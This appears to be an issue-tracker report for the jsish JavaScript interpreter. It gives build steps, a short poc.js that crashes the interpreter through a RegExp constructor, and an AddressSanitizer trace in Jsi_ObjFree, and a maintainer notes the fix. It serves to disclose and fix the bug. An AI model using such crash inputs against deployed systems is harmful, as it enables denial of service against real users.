Use-after-free in Jsi_ObjFree (Jsi_ObjFree src/jsiObj.c:342)

[paintedveil5]

jsish reversion 62aca5884bdfee527f302d102750254a3dd4056d master

Build platform Ubuntu 16.04.7 LTS (Linux 4.15.0-142-generic x86_64)

Build steps

export CFLAGS="-g -fsanitize=address -O0 -fprofile-arcs -ftest-coverage -fno-omit-frame-pointer"
export CXXFLAGS="-g -fsanitize=address -O0 -fprofile-arcs -ftest-coverage -fno-omit-frame-pointer"
./jsish poc.js

Test case poc.js

try {
    new RegExp("\nfo of (function*() {}\n");
} catch (e) {}

Output

ASAN:SIGSEGV
=================================================================
==57394==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000048 (pc 0x000000519c58 bp 0x7ffe989f55f0 sp 0x7ffe989f55d0 T0)
    #0 0x519c57 in Jsi_ObjFree src/jsiObj.c:342
    #1 0x51ad8d in Jsi_ObjDecrRefCount src/jsiObj.c:443
    #2 0x429654 in ValueFree src/jsiValue.c:178
    #3 0x4299fa in Jsi_ValueReset src/jsiValue.c:222
    #4 0x613024 in jsiClearStack src/jsiEval.c:123
    #5 0x6139de in jsiPop src/jsiEval.c:200
    #6 0x615818 in jsiDoThrow src/jsiEval.c:374
    #7 0x631914 in jsiEvalCodeSub src/jsiEval.c:2123
    #8 0x633341 in jsi_evalcode src/jsiEval.c:2223
    #9 0x638a0e in jsi_evalStrFile src/jsiEval.c:2676
    #10 0x63952b in Jsi_EvalFile src/jsiEval.c:2725
    #11 0x449d61 in Jsi_Main src/jsiInterp.c:936
    #12 0x87e24b in jsi_main src/main.c:47
    #13 0x87e37f in main src/main.c:55
    #14 0x7f4dc6ad383f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
    #15 0x415168 in _start (/home/lily/Desktop/01-afl-targets/new/jsish/jsish+0x415168)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiObj.c:342 Jsi_ObjFree
==57394==ABORTING

[pcmacdon]

FIxed in commit SHA: 4e5066c